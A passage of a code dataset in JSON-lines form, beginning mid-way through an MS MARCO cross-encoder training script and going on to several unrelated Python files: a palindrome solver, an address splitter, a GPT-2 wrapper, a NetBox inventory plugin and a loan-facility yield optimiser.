a continuous score between 0 and 1\nmodel = CrossEncoder(model_name, num_labels=1, max_length=512)\n\n\n### Now we read the MS Marco dataset\ndata_folder = 'msmarco-data'\nos.makedirs(data_folder, exist_ok=True)\n\n\n#### Read the corpus files that contain all the passages. 
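Each line of collection.tsv is a tab-separated (pid, passage) pair. 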
Store them in the corpus dict\ncorpus = {}\ncollection_filepath = os.path.join(data_folder, 'collection.tsv')\nif not os.path.exists(collection_filepath):\n tar_filepath = os.path.join(data_folder, 'collection.tar.gz')\n if not os.path.exists(tar_filepath):\n logging.info(\"Download collection.tar.gz\")\n util.http_get('https://msmarco.blob.core.windows.net/msmarcoranking/collection.tar.gz', tar_filepath)\n\n with tarfile.open(tar_filepath, \"r:gz\") as tar:\n tar.extractall(path=data_folder)\n\nwith open(collection_filepath, 'r', encoding='utf8') as fIn:\n for line in fIn:\n pid, passage = line.strip().split(\"\\t\")\n corpus[pid] = passage\n\n\n### Read the train queries, store in queries dict\nqueries = {}\nqueries_filepath = os.path.join(data_folder, 'queries.train.tsv')\nif not os.path.exists(queries_filepath):\n tar_filepath = os.path.join(data_folder, 'queries.tar.gz')\n if not os.path.exists(tar_filepath):\n logging.info(\"Download queries.tar.gz\")\n util.http_get('https://msmarco.blob.core.windows.net/msmarcoranking/queries.tar.gz', tar_filepath)\n\n with tarfile.open(tar_filepath, \"r:gz\") as tar:\n tar.extractall(path=data_folder)\n\n\nwith open(queries_filepath, 'r', encoding='utf8') as fIn:\n for line in fIn:\n qid, query = line.strip().split(\"\\t\")\n queries[qid] = query\n\n\n\n### Now we create our training & dev data\ntrain_samples = []\ndev_samples = {}\n\n# We use 200 random queries from the train set for evaluation during training\n# Each query has at least one relevant and up to 200 irrelevant (negative) passages\nnum_dev_queries = 200\nnum_max_dev_negatives = 200\n\n# msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz and msmarco-qidpidtriples.rnd-shuf.train.tsv.gz is a randomly\n# shuffled version of qidpidtriples.train.full.2.tsv.gz from the MS Marco website\n# We extracted in the train-eval split 500 random queries that can be used for evaluation during training\ntrain_eval_filepath = os.path.join(data_folder, 'msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz')\nif not os.path.exists(train_eval_filepath):\n logging.info(\"Download \"+os.path.basename(train_eval_filepath))\n util.http_get('https://sbert.net/datasets/msmarco-qidpidtriples.rnd-shuf.train-eval.tsv.gz', train_eval_filepath)\n\nwith gzip.open(train_eval_filepath, 'rt') as fIn:\n for line in fIn:\n qid, pos_id, neg_id = line.strip().split()\n\n if qid not in dev_samples and len(dev_samples) < num_dev_queries:\n dev_samples[qid] = {'query': queries[qid], 'positive': set(), 'negative': set()}\n\n if qid in dev_samples:\n dev_samples[qid]['positive'].add(corpus[pos_id])\n\n if len(dev_samples[qid]['negative']) < num_max_dev_negatives:\n dev_samples[qid]['negative'].add(corpus[neg_id])\n\n\n# Read our training file\ntrain_filepath = os.path.join(data_folder, 'msmarco-qidpidtriples.rnd-shuf.train.tsv.gz')\nif not os.path.exists(train_filepath):\n logging.info(\"Download \"+os.path.basename(train_filepath))\n util.http_get('https://sbert.net/datasets/msmarco-qidpidtriples.rnd-shuf.train.tsv.gz', train_filepath)\n\ncnt = 0\nwith gzip.open(train_filepath, 'rt') as fIn:\n for line in tqdm.tqdm(fIn, unit_scale=True):\n qid, pos_id, neg_id = line.strip().split()\n\n if qid in dev_samples:\n continue\n\n query = queries[qid]\n if (cnt % (pos_neg_ration+1)) == 0:\n passage = corpus[pos_id]\n label = 1\n else:\n passage = corpus[neg_id]\n label = 0\n\n train_samples.append(InputExample(texts=[query, passage], label=label))\n cnt += 1\n\n if cnt >= max_train_samples:\n break\n\n# We create a DataLoader to load our 
train samples\ntrain_dataloader = DataLoader(train_samples, shuffle=True, batch_size=train_batch_size)\n\n# We add an evaluator, which evaluates the performance during training\n# It performs a classification task and measures scores like F1 (finding relevant passages) and Average Precision\nevaluator = CERerankingEvaluator(dev_samples, name='train-eval')\n\n# Configure the training\nwarmup_steps = 5000\nlogging.info(\"Warmup-steps: {}\".format(warmup_steps))\n\n\n# Train the model\nmodel.fit(train_dataloader=train_dataloader,\n evaluator=evaluator,\n epochs=num_epochs,\n evaluation_steps=10000,\n warmup_steps=warmup_steps,\n output_path=model_save_path,\n use_amp=True)\n\n#Save latest model\nmodel.save(model_save_path+'-latest')","repo_name":"UKPLab/sentence-transformers","sub_path":"examples/training/ms_marco/train_cross-encoder_scratch.py","file_name":"train_cross-encoder_scratch.py","file_ext":"py","file_size_in_byte":6985,"program_lang":"python","lang":"en","doc_type":"code","stars":12439,"dataset":"github-code","pt":"48"} +{"seq_id":"38121960180","text":"def longestPalindrome(s: str) -> str:\n res = \"\"\n resLen = 0\n\n for i in range(len(s)):\n # odd length\n l, r = i, i\n while l >= 0 and r < len(s) and s[l] == s[r]:\n if (r - l + 1) > resLen:\n res = s[l: r + 1]\n resLen = r - l + 1\n l -= 1\n r += 1\n\n # even length\n l, r = i, i + 1\n while l >= 0 and r < len(s) and s[l] == s[r]:\n if (r - l + 1) > resLen:\n res = s[l: r + 1]\n resLen = r - l + 1\n l -= 1\n r += 1\n\n return res\n\n\ndef test():\n test_cases = [\n {\n \"name\": \"simple case 1\",\n \"input\": \"babad\",\n \"expected\": \"bab\"\n },\n {\n \"name\": \"simple case 2\",\n \"input\": \"cbbd\",\n \"expected\": \"bb\"\n }\n ]\n\n for test_case in test_cases:\n assert test_case[\"expected\"] == longestPalindrome(test_case[\"input\"]), test_case[\"name\"]\n\nif __name__ == \"__main__\":\n from datetime import datetime\n start_time = datetime.now()\n test()\n print(\"Everything passed\")\n end_time = datetime.now()\n print('Duration: {}'.format(end_time - start_time))","repo_name":"0xspringtime/leetcode","sub_path":"0005.py","file_name":"0005.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"27820629449","text":"import pandas as pd\nimport json\n\n\n# This program takes an address as an input from the user through the terminal. \n# Then, it splits and returns the address as street and house number. 
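\n# The split is heuristic: it keys off commas and off where runs of digits start or end in the address.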
\n# Lastly, it saves all the information in a CSV file named 'Addresses.csv'\n\n\n\"\"\"\n These are some examples of inputs and outputs from the program\n\n \"Winterallee 3\" -> {\"street\": \"Winterallee\", \"housenumber\": \"3\"}\n \"Musterstrasse 45\" -> {\"street\": \"Musterstrasse\", \"housenumber\": \"45\"}\n \"Blaufeldweg 123B\" -> {\"street\": \"Blaufeldweg\", \"housenumber\": \"123B\"}\n \"Am Bächle 23\" -> {\"street\": \"Am Bächle\", \"housenumber\": \"23\"}\n \"Auf der Vogelwiese 23 b\" -> {\"street\": \"Auf der Vogelwiese\", \"housenumber\": \"23 b\"}\n \"4, rue de la revolution\" -> {\"street\": \"rue de la revolution\", \"housenumber\": \"4\"}\n \"200 Broadway Av\" -> {\"street\": \"Broadway Av\", \"housenumber\": \"200\"}\n \"Calle Aduana, 29\" -> {\"street\": \"Calle Aduana\", \"housenumber\": \"29\"}\n \"Calle 39 No 1540\" -> {\"street\": \"Calle 39\", \"housenumber\": \"No 1540\"}\n\"\"\"\n\n\n# Initialize a dictionary to generate or append later to the CSV file\ndicctionaryToDB = {\n \"address\": list(),\n \"street\": list(),\n \"housenumber\": list()\n}\n\n\ndef save_address(address, street, housenumber):\n \"\"\"\n Take address data and append it to the initialized dictionary\n \"\"\"\n dicctionaryToDB[\"address\"].append(address)\n dicctionaryToDB[\"street\"].append(street)\n dicctionaryToDB[\"housenumber\"].append(housenumber)\n\n\ndef generate_csv():\n \"\"\"\n Try to open \"Addresses.csv\" and appends to it the information from the inserted address.\n If it cannot open it, it will create it and append the information from the inserted address.\n \"\"\"\n try:\n df = pd.read_csv(\"Addresses.csv\", index_col=\"Unnamed: 0\", sep=';')\n updatedDf = pd.concat([df, pd.DataFrame(dicctionaryToDB)], ignore_index=True, join=\"outer\")\n updatedDf.to_csv('Addresses.csv', sep=';')\n\n except:\n df = pd.DataFrame(dicctionaryToDB)\n df.to_csv('Addresses.csv', sep=';')\n\n\ndef address_house_separator(address):\n \"\"\"\n Takes as an input an address and makes all the pertinent transformations to divide the \n input into street and house number. 
Then, it retrieves this information in the form of a JSON.\n\n It also saves all that information into the python dictionary 'dicctionaryToDB'\n \"\"\"\n fil = [x.isnumeric() for x in address.split()]\n\n if ',' in address:\n lis = [x.strip() for x in address.split(',')]\n housenumber = min(lis, key=len)\n street = max(lis, key=len)\n\n elif len([i for (i, v) in zip(address.split(), fil) if v]) > 1:\n for x in range(1, len(address)):\n if address[x-1].isnumeric() == True and address[x].isnumeric() == False:\n lis = [address[:x].strip(), address[x:].strip()]\n street = max(lis, key=len)\n housenumber = min(lis, key=len)\n break\n\n else:\n if address[0].isdigit():\n housenumber = address.split()[0].strip()\n street = ' '.join(address.split()[1:]).strip()\n\n else:\n for x in range(len(address)):\n if address[x].isnumeric():\n street = address[:x].strip()\n housenumber = address[x:].strip()\n break\n \n save_address(address, street, housenumber)\n generate_csv()\n return print(json.dumps({\"street\":street, \"housenumber\":housenumber}))\n\n\n# Try to open \"Addresses.csv\" and appends to it the information from the inserted address.\n# If it cannot open it, it will create it and append the information from the inserted address.\ntry:\n df = pd.read_csv(\"Addresses.csv\", index_col=\"Unnamed: 0\", sep=';')\n updatedDf = pd.concat([df, pd.DataFrame(dicctionaryToDB)], ignore_index=True, join=\"outer\")\n updatedDf.to_csv('Addresses.csv', sep=';')\n\nexcept:\n df = pd.DataFrame(dicctionaryToDB)\n df.to_csv('Addresses.csv', sep=';')\n \n \n \nif __name__ == \"__main__\":\n # the function requires an address; read one from the terminal as the module comment describes\n address_house_separator(input(\"Please enter an address: \"))\n","repo_name":"david94zgz/Addresses-separator","sub_path":"Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":4043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"33899937995","text":"\"\"\"This is SWAMP: Solving structures With Alpha Membrane Pairs\n\nThis module implements classes and methods to be used as a logging interface by SWAMP.\n\"\"\"\n\n__author__ = \"Filomeno Sanchez Rodriguez\"\n__credits__ = \"Daniel Rigden, & Ronan Keegan\"\n__email__ = \"filomeno.sanchez-rodriguez@liv.ac.uk\"\n\nfrom swamp import version\nimport os\n\n__version__ = version.__version__\n\nif 'DISABLE_DEPENDENCY_CHECKS' not in os.environ and \"CCP4\" not in os.environ:\n raise RuntimeError(\"Cannot find CCP4 root directory\")\n\n_PACKAGE_PATH = os.path.join(os.environ[\"CCP4\"], \"lib\", \"py2\", \"swamp\")\nIDEALHELICES_DIR = os.path.join(_PACKAGE_PATH, \"idealhelices\")\n\n\ndef SwampLogger(*args, **kwargs):\n \"\"\":py:obj:`~swamp.logger.swamplogger.SwampLogger` instance\"\"\"\n from swamp.logger.swamplogger import SwampLogger\n\n return SwampLogger(*args, **kwargs)\n","repo_name":"rigdenlab/SWAMP","sub_path":"swamp/logger/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"48"} +{"seq_id":"15024243047","text":"\"\"\"Wrapper for a GPT-2 model.\"\"\"\n\n\n\nimport torch\nimport transformers\n\nfrom .transformers_model import TransformersModel\nfrom .utils import punctuated_join\n\n\nclass GPT2Model(TransformersModel):\n def __init__(self, config):\n super().__init__(\n config,\n tokenizer_cls=transformers.GPT2Tokenizer,\n model_cls=transformers.GPT2LMHeadModel,\n use_prefix_space=True,\n add_padding_token=True,\n bidirectional=False\n )\n\n # From: https://github.com/huggingface/transformers/issues/3021\n 
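# Note: the loop below freezes each sequence's position ids at its last non-padding token, so padded batch entries keep valid generation positions.\n 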
@torch.no_grad()\n def predict(self, left_contexts, right_contexts):\n inputs = [punctuated_join(left_context) for left_context in left_contexts]\n inputs_dict = self.tokenizer.batch_encode_plus(inputs, padding=True, add_prefix_space=False, return_tensors=\"pt\")\n inputs = inputs_dict[\"input_ids\"].to(self.device)\n attn_mask = inputs_dict[\"attention_mask\"].to(self.device)\n\n last_non_masked_idx = torch.sum(attn_mask, dim=1) - 1\n # get position ids\n position_ids = torch.tensor([list(range(inputs.shape[1])) for i in range(inputs.shape[0])]).to(self.device)\n for i, position_ids_slice in enumerate(position_ids):\n position_ids_slice[last_non_masked_idx[i]:] = position_ids_slice[last_non_masked_idx[i]]\n\n logits = self.model(inputs, attention_mask=attn_mask, position_ids=position_ids)[0]\n result = logits[torch.arange(len(left_contexts), device=self.device), last_non_masked_idx].cpu()\n return result\n","repo_name":"bnewm0609/refining-tse","sub_path":"src/models/gpt2_model.py","file_name":"gpt2_model.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"12284547834","text":"#!/usr/bin/env python\n\nimport pandas as pd\nimport utils\n\nfrom facility import Facility\nfrom loan_request import LoanRequest\n\n\nclass LoanFacilitiesServer(object):\n \"\"\"\n LoanFacilitiesServer class with loan stream processing capability.\n\n NOTE: This class abstracts the input _format_ specific parsing. Input format is likely\n to change with time. Ideally, there should be dedicated classes for each input source\n isolating format specific parsing functionality.\n\n Idempotent Interfaces:\n LoanFacilitiesServer(): Constructor that loads & parses facilities, covenants and loans csv\n parse_facilities_and_covenants(): Parses facilities and covenants into a unified list\n parse_loan_request(): Parses loan requests into a convenient `LoanRequest` object\n\n Non-Idempotent Interfaces:\n process_loans_stream(): Processes loans for optimal yield facility assignment\n log_loan_assignment(): Logs loan assignment\n generate_facility_yield_report(): Generates facility yield report\n \"\"\"\n\n def __init__(self, facilities_csv_path, covenants_csv_path, loans_csv_path):\n \"\"\"\n Constructor for `LoanFacilitiesServer`.\n\n Performs the following steps:\n 1. Loads facilities, covenants and loans csv into dataframes.\n 2. Parses facilities and covenants into a unified list of `Facility` objects.\n 3. 
Sorts `facilities_list` by `interest_rate` to optimize yield\n\n Arguments:\n facilities_csv_path (string)\n covenants_csv_path (string)\n loans_csv_path (string)\n\n Returns:\n `LoanFacilitiesServer` object\n\n Raises:\n OSError: if any of the input files are not accessible\n \"\"\"\n\n # Load Facilities with its associated Covenants\n self.facilities_df = pd.read_csv(facilities_csv_path)\n self.covenants_df = pd.read_csv(covenants_csv_path)\n\n # Parse Facilities & Covenants\n self.facilities_list = self.parse_facilities_and_covenants()\n # Sort facility by `interest_rate` to optimize yield\n self.facilities_list.sort(key=lambda facility: facility.interest_rate)\n\n # Load Loans csvfile\n # NOTE: This will be processed as a stream input\n self.loans_df = pd.read_csv(loans_csv_path)\n\n def parse_facilities_and_covenants(self, facilities_df=None, covenants_df=None):\n \"\"\"\n Parses facilities and covenants into a unified list of `Facility` objects\n\n Arguments:\n facilities_df (dataframe) or None\n covenants_df (dataframe) or None\n\n Returns:\n facilities_list (list of Facility objects)\n\n Raises:\n AttributeError: if facilities_df or covenants_df are not valid dataframes\n TypeError: if facilities_df or covenants_df have invalid values\n\n Known Limitations:\n Input format specific parser.\n \"\"\"\n # TODO(Future): Move this function to an input source specific class\n\n if facilities_df is None:\n facilities_df = self.facilities_df\n if covenants_df is None:\n covenants_df = self.covenants_df\n\n facilities_list = []\n for facility_metadata in facilities_df.itertuples():\n facility_covenants_df = covenants_df[covenants_df.facility_id == facility_metadata.id]\n\n max_default_likelihood = float(facility_covenants_df.max_default_likelihood.dropna())\n facility_id = int(facility_metadata.id)\n bank_id = int(facility_metadata.bank_id)\n amount = float(facility_metadata.amount)\n interest_rate = float(facility_metadata.interest_rate)\n banned_states = facility_covenants_df.banned_state.tolist()\n\n facilities_list.append(Facility(facility_id,\n bank_id,\n amount,\n interest_rate,\n max_default_likelihood,\n banned_states))\n return facilities_list\n\n def parse_loan_request(self, loan):\n \"\"\"\n Parses a single loan request stream input entry into a convenient `LoanRequest` object.\n\n Arguments:\n loan (dataframe row)\n\n Returns:\n loan_request (LoanRequest object)\n\n Raises:\n AttributeError: if `loan` is not a valid dataframe row\n TypeError: if `loan` has an invalid value\n\n Known Limitations:\n Input format specific parser.\n \"\"\"\n # TODO(Future): Move this function to an input source specific class\n\n loan_id = int(loan.id)\n amount = float(loan.amount)\n default_likelihood = float(loan.default_likelihood)\n interest_rate = float(loan.interest_rate)\n origin_state = str(loan.state)\n\n loan_request = LoanRequest(loan_id,\n amount,\n default_likelihood,\n interest_rate,\n origin_state)\n return loan_request\n\n def process_loans_stream(self, assignment_csv_path):\n \"\"\"\n Processes a loan stream to find an optimal yield given a list of facilities\n while satisfying their covenants and constraints.\n\n For every loan in the stream, perform the following steps:\n 1. Parse a single loan request\n 2. Find an optimal valid loan assignment given `facilities_list`\n 3. Issue Loan via a facility\n 4. 
Log loan assignment\n\n        NOTE: This is not an idempotent function as it issues side effects\n\n        Arguments:\n            assignment_csv_path (string)\n\n        Returns:\n            None\n\n        Raises:\n            OSError: if assignment_csv_path is not accessible\n            AttributeError: if `loan` is not a valid dataframe row\n            TypeError: if `loan` has an invalid value\n\n        Side Effects:\n            Writing to a file\n        \"\"\"\n        # NOTE: On a large-scale high-performance production system this should be implemented\n        # as a distributed system of workers performing various streaming and batch reporting tasks\n\n        for loan in self.loans_df.itertuples():\n            # Parse a _single_ Loan Request\n            loan_request = self.parse_loan_request(loan)\n            # Iterate over facilities for loan assignments\n            for facility in self.facilities_list:\n                if facility.is_valid_assignment(loan_request):\n                    # Issue Loan and compute corresponding expected yield\n                    # NOTE: Return value `expected_yield` of `issue_loan` is unused here but could be used\n                    # to feed into a real-time monitoring dashboard. Imagine a graph of:\n                    # (a) Overall Yield vs. Time, or\n                    # (b) Yield Per Facility vs. Time\n                    facility.issue_loan(loan_request)\n\n                    # Log Loan Assignment\n                    self.log_loan_assignment(assignment_csv_path, loan_request.loan_id, facility.facility_id)\n\n                    # Loan request satisfied\n                    break\n\n    @classmethod\n    def log_loan_assignment(cls, csv_filepath, loan_id, facility_id):\n        \"\"\"\n        Consumes a generic stream writer to log a loan assignment\n\n        NOTE: This is not an idempotent function as it issues side effects\n\n        Arguments:\n            csv_filepath (string)\n            loan_id (integer)\n            facility_id (integer)\n\n        Returns:\n            None\n\n        Raises:\n            OSError: if csv_filepath is not accessible\n\n        Side Effects:\n            Writing to a file\n        \"\"\"\n        header = ['loan_id', 'facility_id']\n        row_values = [loan_id, facility_id]\n        utils.stream_writer(csv_filepath, header, row_values)\n\n    def generate_facility_yield_report(self, csv_filepath, facilities_list=None):\n        \"\"\"\n        Generates an overall yield report of all facilities\n\n        NOTE: This is not an idempotent function as it issues side effects\n\n        Arguments:\n            csv_filepath (string)\n            facilities_list (list of `Facility` objects)\n\n        Returns:\n            None\n\n        Raises:\n            OSError: if csv_filepath is not accessible\n            AttributeError: if `facilities_list` is not a valid list of `Facility` objects\n            TypeError: if `facilities_list` has an invalid value\n\n        Side Effects:\n            Writing to a file\n        \"\"\"\n        if facilities_list is None:\n            facilities_list = self.facilities_list\n\n        drop_columns = ['balance_amount', 'bank_id', 'banned_states', 'initial_amount',\n                        'interest_rate', 'max_default_likelihood', 'current_yield']\n        yield_report = pd.DataFrame(vars(f) for f in facilities_list)\n        yield_report['expected_yield'] = yield_report.current_yield.apply(lambda amount: round(amount))\n        yield_report = yield_report.drop(drop_columns, axis=1)\n        yield_report.to_csv(path_or_buf=csv_filepath, index=False)\n","repo_name":"manavkataria/work_samples","sub_path":"bank_loan_yield_optimization/loan_facilities_server.py","file_name":"loan_facilities_server.py","file_ext":"py","file_size_in_byte":9555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
{"seq_id":"5015842409","text":"import os\nimport math\nfrom pprint import pprint\nfrom typing import Any, Dict, List, Optional, Union\n\nfrom nornir.core.deserializer.inventory import Inventory, HostsDict\nfrom requests.packages.urllib3.exceptions import InsecureRequestWarning\n\n\nimport requests\n\n\nclass NBExInventory(Inventory):\n    def 
__init__(\n        self,\n        nb_url: Optional[str] = None,\n        nb_token: Optional[str] = None,\n        use_slugs: bool = True,\n        ssl_verify: Union[bool, str] = True,\n        flatten_custom_fields: bool = True,\n        filter_parameters: Optional[Dict[str, Any]] = None,\n        **kwargs: Any,\n    ) -> None:\n        \"\"\"\n\n        Netbox Extended Plugin\n\n        nb_url: Netbox url, defaults to http://localhost:8080.\n            You can also use env variable NB_URL\n        nb_token: Netbox token. You can also use env variable NB_TOKEN\n        use_slugs: Whether to use slugs or not\n        ssl_verify: Enable/disable certificate validation or provide path to CA bundle file\n        flatten_custom_fields: Whether to assign custom fields directly to the host or not\n        filter_parameters: Key-value pairs to filter down hosts\n\n        \"\"\"\n        filter_parameters = filter_parameters or {}\n        nb_url = nb_url or os.environ.get(\"NB_URL\", \"http://localhost:8080\")\n        nb_token = nb_token or os.environ.get(\n            \"NB_TOKEN\", \"jkdbfgjklsbdfugbsodiufbgsldfjbsdf\"\n        )\n\n        nb_devices = self._fetch_data(\n            nb_url=nb_url,\n            ssl_verify=ssl_verify,\n            nb_token=nb_token,\n            filter_parameters=filter_parameters,\n            get_devices=True,\n        )\n        hosts = {}\n        for d in nb_devices:\n            host: HostsDict = {\"data\": {}}\n\n            # Add the value for IP address\n            if d.get(\"primary_ip\", {}):\n                host[\"hostname\"] = d[\"primary_ip\"][\"address\"].split(\"/\")[0]\n\n            # Add the values that don't have an option for 'slug'\n            host[\"data\"][\"serial\"] = d[\"serial\"]\n            host[\"data\"][\"vendor\"] = d[\"device_type\"][\"manufacturer\"][\"name\"]\n            host[\"data\"][\"asset_tag\"] = d[\"asset_tag\"]\n\n            if flatten_custom_fields:\n                for cf, value in d[\"custom_fields\"].items():\n                    host[\"data\"][cf] = value\n            else:\n                host[\"data\"][\"custom_fields\"] = d[\"custom_fields\"]\n\n            # Add values that have an option for 'slug'\n            if use_slugs:\n                host[\"data\"][\"site\"] = d[\"site\"][\"slug\"]\n                host[\"data\"][\"role\"] = d[\"device_role\"][\"slug\"]\n                host[\"data\"][\"model\"] = d[\"device_type\"][\"slug\"]\n\n                # Attempt to add 'platform' based on the value in 'slug'\n                host[\"platform\"] = d[\"platform\"][\"slug\"] if d[\"platform\"] else None\n            else:\n                host[\"data\"][\"site\"] = d[\"site\"][\"name\"]\n                host[\"data\"][\"role\"] = d[\"device_role\"]\n                host[\"platform\"] = d[\"platform\"]\n\n            # Get the IP addresses assigned to the interfaces of the host\n            host[\"data\"][\"interfaces\"] = self._get_host_interfaces(\n                nb_url=nb_url, ssl_verify=ssl_verify, nb_token=nb_token, host_id=d[\"id\"]\n            )\n\n            # Get Site ASN and custom fields for the host.\n            site_results = self._fetch_data(\n                nb_url=nb_url,\n                ssl_verify=ssl_verify,\n                nb_token=nb_token,\n                get_site_data=True,\n            )\n\n            for site_result in site_results:\n                if site_result[\"id\"] == d[\"site\"][\"id\"]:\n                    host[\"data\"][\"asn\"] = site_result[\"asn\"]\n\n                    if flatten_custom_fields:\n                        for site_cf, value in site_result[\"custom_fields\"].items():\n                            host[\"data\"][site_cf] = value\n                    else:\n                        host[\"data\"][\"custom_fields\"] = site_result[\"custom_fields\"]\n\n            # Assign temporary dict to outer Dict\n            # Netbox allows devices to be unnamed, but the Nornir model doesn't.\n            # If a device is unnamed, set the name to the id of the device in netbox\n            hosts[d.get(\"name\") or d.get(\"id\")] = host\n\n        super().__init__(hosts=hosts, groups={}, defaults={}, **kwargs)\n\n    def _fetch_data(\n        self,\n        nb_url=None,\n        ssl_verify=True,\n        nb_token=None,\n        host_id=None,\n        interface_id=None,\n        site_id=None,\n        filter_parameters=None,\n        get_devices=False,\n        get_interfaces=False,\n        get_interfaces_ip=False,\n        get_site_data=False,\n    ):\n        \"\"\"\n        
Fetch data from Netbox API based on flags:\n\n        get_devices=False - Fetch all devices from Netbox\n        get_interfaces=False - Fetch all interfaces data for a specific host\n        get_interfaces_ip = False - Fetch all IP addresses for a specific interface on specific host\n        get_site_data = False - Fetch all the site data and custom fields for the host's site\n\n        get_devices, get_interfaces, get_site_data and get_interfaces_ip are mutually exclusive\n\n        \"\"\"\n        results: List[Dict[str, Any]] = []\n        if get_devices:\n            url = f\"{nb_url}/api/dcim/devices/?limit=0\"\n            get_interfaces = False\n            get_interfaces_ip = False\n            get_site_data = False\n\n        if get_interfaces_ip:\n            url = f\"{nb_url}/api/ipam/ip-addresses?device_id={host_id}&interface_id={interface_id}\"\n            get_interfaces = False\n            get_devices = False\n            get_site_data = False\n\n        if get_interfaces:\n            url = f\"{nb_url}/api/dcim/interfaces?device_id={host_id}\"\n            get_devices = False\n            get_interfaces_ip = False\n            get_site_data = False\n\n        if get_site_data:\n            url = f\"{nb_url}/api/dcim/sites/\"\n            get_devices = False\n            get_interfaces_ip = False\n            get_interfaces = False\n\n        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)\n        session = requests.Session()\n        session.headers.update({\"Authorization\": f\"Token {nb_token}\"})\n        session.verify = ssl_verify\n\n        # Fetch all devices from Netbox\n        # Netbox's API uses pagination; fetch until there is no next page\n\n        while url:\n            if get_devices:\n                r = session.get(url, params=filter_parameters)\n            else:\n                r = session.get(url)\n\n            if r.status_code != 200:\n                raise ValueError(\n                    f\"Failed to fetch data from Netbox instance {nb_url}\"\n                )\n\n            resp = r.json()\n            results.extend(resp.get(\"results\"))\n\n            url = resp.get(\"next\")\n        return results\n\n    def _get_host_interfaces(self, nb_url, ssl_verify, nb_token, host_id):\n\n        interfaces_list = []\n        interfaces = {}\n        ip_interface_list = []\n        lag_members = []\n        lags_list = []\n        lags = {}\n\n        interfaces_results = self._fetch_data(\n            nb_url=nb_url,\n            ssl_verify=ssl_verify,\n            nb_token=nb_token,\n            host_id=host_id,\n            get_interfaces=True,\n        )\n\n        for interface_dict in interfaces_results:\n            interfaces_list.append(interface_dict[\"name\"])\n\n        for interface in interfaces_list:\n            for interface_dict in interfaces_results:\n                if interface == interface_dict[\"name\"]:\n                    interfaces[interface] = {}\n                    interfaces[interface][\"IPv4\"] = []\n                    interfaces[interface][\"IPv6\"] = []\n                    interfaces[interface][\"id\"] = interface_dict[\"id\"]\n                    # Check if interface is member of a LAG\n                    if interface_dict[\"lag\"] is not None:\n                        interfaces[interface][\"lag\"] = {}\n                        interfaces[interface][\"lag\"][\"name\"] = interface_dict[\"lag\"][\n                            \"name\"\n                        ]\n                        interfaces[interface][\"lag\"][\"id\"] = interface_dict[\"lag\"][\"id\"]\n                        lag_info = interface, interface_dict[\"lag\"][\"name\"]\n                        lag_members.append(lag_info)\n\n                    interfaces[interface][\"mtu\"] = interface_dict[\"mtu\"]\n                    interfaces[interface][\"enabled\"] = interface_dict[\"enabled\"]\n                    interfaces[interface][\"description\"] = interface_dict[\"description\"]\n\n                    # Get the IP addresses for interfaces that have IP addresses defined\n\n                    if interface_dict[\"count_ipaddresses\"] >= 1:\n                        ip_results = self._fetch_data(\n                            nb_url=nb_url,\n                            ssl_verify=ssl_verify,\n                            nb_token=nb_token,\n                            host_id=host_id,\n                            interface_id=interface_dict[\"id\"],\n                            get_interfaces_ip=True,\n                        )\n\n                        for intf_ip_dict in ip_results:\n                            interface_ip_tuple = (\n                                intf_ip_dict[\"address\"],\n                                intf_ip_dict[\"family\"][\"label\"],\n                                interface,\n                            )\n                            
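# gather one (address, family label, interface) tuple per assigned IP; these are split into the IPv4/IPv6 lists just below\n                            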
ip_interface_list.append(interface_ip_tuple)\n\n                        for element in ip_interface_list:\n                            if interface in element:\n                                if \"IPv4\" in element:\n                                    interfaces[interface][\"IPv4\"].append(element[0])\n                                else:\n                                    interfaces[interface][\"IPv6\"].append(element[0])\n\n        # Get the min-links for the LAG interfaces\n\n        # Create a list of LAGs from the tuple list\n        for lag_tuple in lag_members:\n            if lag_tuple[1] not in lags_list:\n                lags_list.append(lag_tuple[1])\n\n        # Create a dict of lag -> List[str] of member names\n        for lag in lags_list:\n            lags[lag] = []\n            for element in lag_members:\n                if lag in element:\n                    lags[lag].append(element[0])\n\n        # Calculate min-links from the lags dict.\n        for lag in lags.keys():\n            num_members = len(lags[lag])\n            min_links = math.ceil(0.5 * num_members)\n            interfaces[lag][\"min_links\"] = min_links\n\n        return interfaces\n","repo_name":"mss7082/nornir_st2","sub_path":"Nornir/workflows/helpers/netboxplus.py","file_name":"netboxplus.py","file_ext":"py","file_size_in_byte":10398,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"}
{"seq_id":"34740748540","text":"def sortByScore(records):\n    records.sort(key = lambda x: x[1])\n    return records\n\ndef sortByName(records):\n    records.sort(key = lambda x: x[0])\n    return records\n\nif __name__ == '__main__':\n    records = []\n    score = 0\n    output = \"\"\n    \n    for _ in range(int(input())):\n        name = input()\n        score = float(input())\n        \n        records.append([name, score])\n    \n    sortByScore(records)\n    \n    lowestScore = records[0][1]\n    \n    for x in range(len(records)):\n        if (records[x][1] != lowestScore):\n            score = records[x][1]\n            break\n    \n    sortByName(records)    \n    \n    for x in range(len(records)):\n        if (score == records[x][1]):\n            output += records[x][0] + \"\\n\"\n    \n    print(output.strip())\n","repo_name":"MGreco2112/Python-Demos","sub_path":"algorithms/Python Nested List.py","file_name":"Python Nested List.py","file_ext":"py","file_size_in_byte":771,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"}
